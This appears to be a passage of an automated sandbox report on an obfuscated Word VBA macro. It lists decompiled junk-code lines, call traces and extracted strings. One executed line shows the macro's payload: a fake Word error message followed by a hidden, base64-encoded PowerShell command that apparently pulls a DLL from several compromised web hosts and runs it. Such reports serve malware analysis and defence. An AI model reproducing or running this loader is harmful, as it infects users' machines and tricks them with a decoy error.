141	sCOIGDtD.WriteLine "JTSPCDjykfL"	WriteLine
142	sCOIGDtD.WriteLine "bBmgOCvPPojGGC"	WriteLine
143	sCOIGDtD.WriteLine "anBQXljzGenE"	WriteLine
144	Set tAmQHxlD = UavHTIBHo	UavHTIBHo
145	sCOIGDtD.Close	Close
146	Set eepvDEaE = Nothing
147	Set gphNDVZp = IcAHwPH	IcAHwPH
148	Set sCOIGDtD = Nothing
148	sCOIGDtD:
150	Goto fmwdEMADQ
151	Dim DkLoDL as Object
152	Set plqkuDI = BNmrm	BNmrm
153	Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
154	Dim fmwdEMADQ as Object
155	Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")	CreateTextFile
156	fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"	WriteLine
157	fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"	WriteLine
158	fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"	WriteLine
159	Set jPJENIo = FLtYjKHC	FLtYjKHC
160	fmwdEMADQ.Close	Close
161	Set DkLoDL = Nothing
162	Set ANzGyzCD = qAUhkIMz	qAUhkIMz
163	Set fmwdEMADQ = Nothing
163	fmwdEMADQ:
165	Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0 V2enhc4htwl7z6bh Thriap3q9rgf3yy9y executed
166	Goto pkixJADG
167	Dim DhnHIY as Object
168	Set oQgLUI = zZuzBZGD	zZuzBZGD
169	Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
170	Dim pkixJADG as Object
171	Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")	CreateTextFile
172	pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"	WriteLine
173	pkixJADG.WriteLine "wypNISsWSXthFJCq"	WriteLine
174	pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"	WriteLine
175	Set ecGmY = OIbfvEEFF	OIbfvEEFF
176	pkixJADG.Close	Close
177	Set DhnHIY = Nothing
178	Set EKmLA = eLmLDU	eLmLDU
179	Set pkixJADG = Nothing
179	pkixJADG:
181	Goto KmGOADt
182	Dim CFdSBD as Object
183	Set nhLeJMLfI = FYVZFEH	FYVZFEH
184	Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
185	Dim KmGOADt as Object
186	Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")	CreateTextFile
187	KmGOADt.WriteLine "DBvMcNtCcMyJDDI"	WriteLine
188	KmGOADt.WriteLine "eXpjHFapHaPdRJu"	WriteLine
189	KmGOADt.WriteLine "eXObOTlBAITEOIo"	WriteLine
190	Set STzBjwICv = hoyzuBGCP	hoyzuBGCP
191	KmGOADt.Close	Close
192	Set CFdSBD = Nothing
193	Set ORLICIl = lADFBaJ	lADFBaJ
194	Set KmGOADt = Nothing
194	KmGOADt:
196	End Function

Function Jlda77h_v8nx5, APIs: 201, Strings: 20, Number of lines: 66, Relevance: 388.566

APIs	Meta Information
SQQWY
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
ddanFDWJf
Close
RhztCF
kwzjKvZHe
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
inIcjJtaF
Close
zBSWCKmJv
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Pg5minli2d3c9
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: sreXHFD
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: eCIzUDyJ
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: yJmmmVIAG
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Replace
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Ij2hesgjee57d3s0
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: uVItICICB
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: anyPG
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close
Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: YVZXECEHD
KXTliE
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
YZllAeRe
Close
hjZwD
FUyIHBDFz
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
AiRdGDAJ
Close
AioOpBFE

Strings	Decrypted Strings
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OiBXGJB:\pnqsZEDV\gsZoAW.EePnB"
"eEWdaDQVJJqTHgF"
"OyFBLhlWUnD"
"TBKmUCEXTUIGu"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OBoYzRpef:\sDLuJ\bmIQSG.MdmDR"
"NeiIGCNWgICn"
"EgxfIDVQbJotWhj"
"UjBKOEDRIbiWFB"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD"
"RhnJRGeBNASBQHHGF"
"WNFUDvHgghFdup"
"eeVVJBMGlcfXMB"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC"
"ptABFEZDmkMVIeD"
"vVbvIHcFGEAJJ"
"NisSEYrcDlKQUITa"

Line	Instruction	Meta Information
197	Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
198	On Error Resume Next	executed
199	Goto PbhYVsA
200	Dim PcHRGIADo as Object
201	Set TXmxvp = SQQWY	SQQWY SQQWY SQQWY SQQWY SQQWY
202	Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
203	Dim PbhYVsA as Object
204	Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
205	PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"	WriteLine WriteLine WriteLine WriteLine WriteLine
206	PbhYVsA.WriteLine "OyFBLhlWUnD"	WriteLine WriteLine WriteLine WriteLine WriteLine
207	PbhYVsA.WriteLine "TBKmUCEXTUIGu"	WriteLine WriteLine WriteLine WriteLine WriteLine
208	Set qHKYGHlFA = ddanFDWJf	ddanFDWJf ddanFDWJf ddanFDWJf ddanFDWJf ddanFDWJf
209	PbhYVsA.Close	Close Close Close Close Close
210	Set PcHRGIADo = Nothing
211	Set sPkIwu = RhztCF	RhztCF RhztCF RhztCF RhztCF RhztCF
212	Set PbhYVsA = Nothing
212	PbhYVsA:
214	Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
215	Goto NuebA
216	Dim sTzDC as Object
217	Set GIAKA = kwzjKvZHe	kwzjKvZHe kwzjKvZHe kwzjKvZHe kwzjKvZHe kwzjKvZHe
218	Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
219	Dim NuebA as Object
220	Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
221	NuebA.WriteLine "NeiIGCNWgICn"	WriteLine WriteLine WriteLine WriteLine WriteLine
222	NuebA.WriteLine "EgxfIDVQbJotWhj"	WriteLine WriteLine WriteLine WriteLine WriteLine
223	NuebA.WriteLine "UjBKOEDRIbiWFB"	WriteLine WriteLine WriteLine WriteLine WriteLine
224	Set idbaDIr = inIcjJtaF	inIcjJtaF inIcjJtaF inIcjJtaF inIcjJtaF inIcjJtaF
225	NuebA.Close	Close Close Close Close Close
226	Set sTzDC = Nothing
227	Set KXwaABT = zBSWCKmJv	zBSWCKmJv zBSWCKmJv zBSWCKmJv zBSWCKmJv zBSWCKmJv
228	Set NuebA = Nothing
228	NuebA:
230	Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
231	Goto gxBPJB
232	Dim zxgLHJSFW as Object
233	Set quDoH = KXTliE	KXTliE KXTliE KXTliE KXTliE KXTliE
234	Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
235	Dim gxBPJB as Object
236	Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
237	gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"	WriteLine WriteLine WriteLine WriteLine WriteLine
238	gxBPJB.WriteLine "WNFUDvHgghFdup"	WriteLine WriteLine WriteLine WriteLine WriteLine
239	gxBPJB.WriteLine "eeVVJBMGlcfXMB"	WriteLine WriteLine WriteLine WriteLine WriteLine
240	Set nleaHR = YZllAeRe	YZllAeRe YZllAeRe YZllAeRe YZllAeRe YZllAeRe
241	gxBPJB.Close	Close Close Close Close Close
242	Set zxgLHJSFW = Nothing
243	Set mgTNFCq = hjZwD	hjZwD hjZwD hjZwD hjZwD hjZwD
244	Set gxBPJB = Nothing
244	gxBPJB:
246	Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
247	Goto mgrwfmN
248	Dim RjiQHRA as Object
249	Set EhCMG = FUyIHBDFz	FUyIHBDFz FUyIHBDFz FUyIHBDFz FUyIHBDFz FUyIHBDFz
